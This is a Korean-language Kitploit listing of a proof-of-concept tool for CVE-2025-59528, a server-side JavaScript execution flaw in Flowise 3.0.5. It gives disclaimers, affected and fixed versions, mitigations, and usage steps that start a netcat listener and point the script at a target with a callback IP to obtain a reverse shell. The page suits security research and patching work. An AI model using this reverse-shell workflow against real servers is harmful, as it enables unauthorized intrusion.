Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-59528-PoC — CVE-2025-59528의 PoC | Kitploit
도구/GitHubGitHub/sonnelon/cve-2025-59528-poc
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration Testing
GitHubsonnelon/cve-2025-59528-poc

CVE-2025-59528-PoC

CVE-2025-59528의 PoC

저장소 보기
1개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2025-59528 PoC

격리된 실험실 환경에서 CVE-2025-59528을 연구하기 위한 개념 증명(PoC)입니다.

[!WARNING] 면책 조항

이 프로젝트는 교육 목적, 보안 연구, 그리고 귀하가 소유했거나 명시적 테스트 승인을 받은 시스템 테스트를 위해서만 엄격히 사용해야 합니다.

소유자의 허가 없이 이 PoC를 제3자 서버, 공공 서비스 또는 인프라에 사용하지 마십시오.

저자는 이 프로젝트의 오용으로 인한 손해, 데이터 손실, 서비스 중단 또는 법적 결과에 대해 책임을 지지 않습니다.

설명

이 PoC는 Flowise에서 사용자 제어 mcpServerConfig 처리를 수반하는 취약점인 CVE-2025-59528의 잠재적 영향을 보여줍니다.

특정 조건에서 이 취약점은 공격자가 서버 측 컨텍스트에서 임의의 JavaScript 코드를 실행할 수 있게 허용할 수 있습니다.

영향을 받는 버전

  • Flowise 3.0.5

수정된 버전

  • Flowise 3.0.6+

테스트 전에 대상 설치의 정확한 버전을 항상 확인하십시오.

요구 사항

  • Python 3
  • requests
  • 로컬 또는 격리된 Flowise 테스트 인스턴스
  • 필요한 권한이 있는 승인된 계정

Python 종속성을 설치합니다:

root@kitploit:~
pip install requests

사용법

도구 다운로드

셸을 얻으려면 netcat을 실행하세요:

root@kitploit:~
nc -lvnp <YOUR_PORT>

다음과 같이 PoC를 실행합니다:

root@kitploit:~
python3 poc.py \
    -t http://TARGET:PORT \
    -o api_key \
    -i CALLBACK_IP \
    -p CALLBACK_PORT

인자

ArgumentDescription
-t, --targetFlowise 테스트 인스턴스의 URL
-o, --api_keyAPI 키
-i, --ip테스트 머신의 IP 주소
-p, --port테스트 환경에서 사용하는 포트

실험실 구성

테스트는 격리된 가상 또는 실험실 네트워크 내에서 수행해야 합니다.

root@kitploit:~
┌──────────────────┐
│    PoC Machine   │
│                  │
│    Python PoC    │
└────────┬─────────┘
         │
         │ Isolated Network
         │
┌────────▼─────────┐
│   Flowise 3.0.5  │
│   Test Instance  │
└──────────────────┘

의도적으로 취약하게 구성된 Flowise 인스턴스를 공용 인터넷에 직접 노출하지 마십시오.

완화 조치

영향을 받는 버전의 Flowise를 실행 중인 경우:

  1. Flowise를 패치된 버전으로 업그레이드하십시오.
  2. 관리 API에 대한 액세스를 제한하십시오.
  3. 신뢰할 수 없는 사용자에게 취약한 기능에 액세스하는 데 필요한 권한을 부여하지 마십시오.
  4. 의심스러운 요청이 있는지 서버 로그를 검토하십시오.
  5. 업그레이드 후 설치를 다시 테스트하십시오.

참고 자료

  • CVE: CVE-2025-59528
  • 영향을 받는 소프트웨어: Flowise
  • 수정 버전: 3.0.6+

법적 고지

이 프로젝트를 사용함으로써 귀하는 모든 관련 법률 및 규정을 준수할 책임이 전적으로 귀하에게 있음을 인정하게 됩니다.

이 PoC는 귀하가 소유한 시스템 또는 보안 테스트 수행에 대한 명시적 승인을 받은 시스템에서만 사용하십시오.